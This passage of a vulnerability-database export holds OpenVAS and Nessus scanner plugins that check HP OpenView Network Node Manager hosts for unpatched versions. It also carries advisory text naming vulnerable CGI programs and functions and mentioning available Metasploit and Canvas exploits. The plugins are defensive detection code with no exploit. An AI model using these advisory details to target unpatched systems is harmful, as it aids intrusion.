script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_hp_openview_nnm_detect.nasl\");\n script_require_ports(\"Services/www\", 7510);\n script_mandatory_keys(\"HP/OVNNM/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/40101\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/59250\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/59249\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2010/Jun/152\");\n script_xref(name:\"URL\", value:\"http://marc.info/?l=bugtraq&m=128525454219838&w=2\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Jun/1024071.html\");\n\n tag_solution = \"Apply the patch for OpenView NNM version 7.53,\n http://seclists.org/bugtraq/2010/Jun/152\n http://support.openview.hp.com/selfsolve/patches\n http://marc.info/?l=bugtraq&m=128525454219838&w=2\n\n *****\n NOTE : No Patch/Solution available for OpenView NNM version 7.51, upgrade to\n OpenView NNM version 7.53 and apply the patch.\n *****\";\n\n tag_impact = \"Successful exploitation will allow attacker to cause a buffer overflow\n via a specially crafted HTTP request to the 'jovgraph.exe' CGI program.\n\n Impact Level: System/Application\";\n\n tag_affected = \"HP OpenView Network Node Manager version 7.51 and 7.53\";\n\n tag_insight = \"The flaws are due to boundary errors,\n - when creating an error message within 'ovwebsnmpsrv.exe'\n - within 'getProxiedStorageAddress()' in 'ovutil.dll'\n - when parsing command line argument variables within 'ovwebsnmpsrv.ex'\n And an unspecified vulnerability allows remote attackers to cause a denial\n of service via unknown vectors.\";\n\n tag_summary = \"This host is running HP OpenView Network Node Manager and\n is prone to multiple vulnerabilities.\";\n\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"insight\", value:tag_insight);\n script_tag(name:\"affected\", value:tag_affected);\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"impact\", value:tag_impact);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_version( cpe:CPE, port:port );\nif( ! vers = get_kb_item( \"www/\"+ port + \"/HP/OVNNM/Ver\" ) ) exit( 0 );\n\n## Check for HP OpenView Network Node Manager equal to 07.51 and 07.53\nif( version_is_equal( version:vers, test_version:\"B.07.51\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.53\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:47:17", "references": ["http://www.nessus.org/u?d5f413ca", "http://www.nessus.org/u?094465cf", "http://www.nessus.org/u?f9c68a79"], "pluginID": "46348", "description": "s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2010-1550 (SSRT090225, ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564) CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553 (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229, ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server. References: CVE-2010-1964 (SSRT100026, ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684) CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - A potential security vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code under the context of the user running the web server.", "edition": 5, "reporter": "Tenable", "published": "2010-05-17T00:00:00", "title": "HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-2709", "CVE-2010-1961", "CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1960", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40708.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46348", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40708. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46348);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\", \"CVE-2010-1960\", \"CVE-2010-1961\", \"CVE-2010-1964\", \"CVE-2010-2709\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"emr_na-c02217439\");\n script_xref(name:\"HP\", value:\"emr_na-c02446520\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n\n script_name(english:\"HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f9c68a79\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094465cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40708 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_40708 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40708\", \"PHSS_41243\", \"PHSS_41607\", \"PHSS_41858\", \"PHSS_42233\", \"PHSS_43047\", \"PHSS_43354\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-DOC-REUS\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:08:34", "references": ["http://www.nessus.org/u?d5f413ca", "http://www.nessus.org/u?094465cf", "http://www.nessus.org/u?f9c68a79"], "pluginID": "46347", "description": "s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server. References: CVE-2010-1964 (SSRT100026, ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684) CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2010-1550 (SSRT090225, ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564) CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553 (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229, ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential security vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code under the context of the user running the web server.", "edition": 5, "reporter": "Tenable", "published": "2010-05-17T00:00:00", "title": "HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-2709", "CVE-2010-1961", "CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1960", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40707.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46347", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40707. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46347);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\", \"CVE-2010-1960\", \"CVE-2010-1961\", \"CVE-2010-1964\", \"CVE-2010-2709\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"emr_na-c02217439\");\n script_xref(name:\"HP\", value:\"emr_na-c02446520\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n\n script_name(english:\"HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f9c68a79\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094465cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40707 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_40707 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40707\", \"PHSS_41242\", \"PHSS_41606\", \"PHSS_41857\", \"PHSS_42232\", \"PHSS_43046\", \"PHSS_43353\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
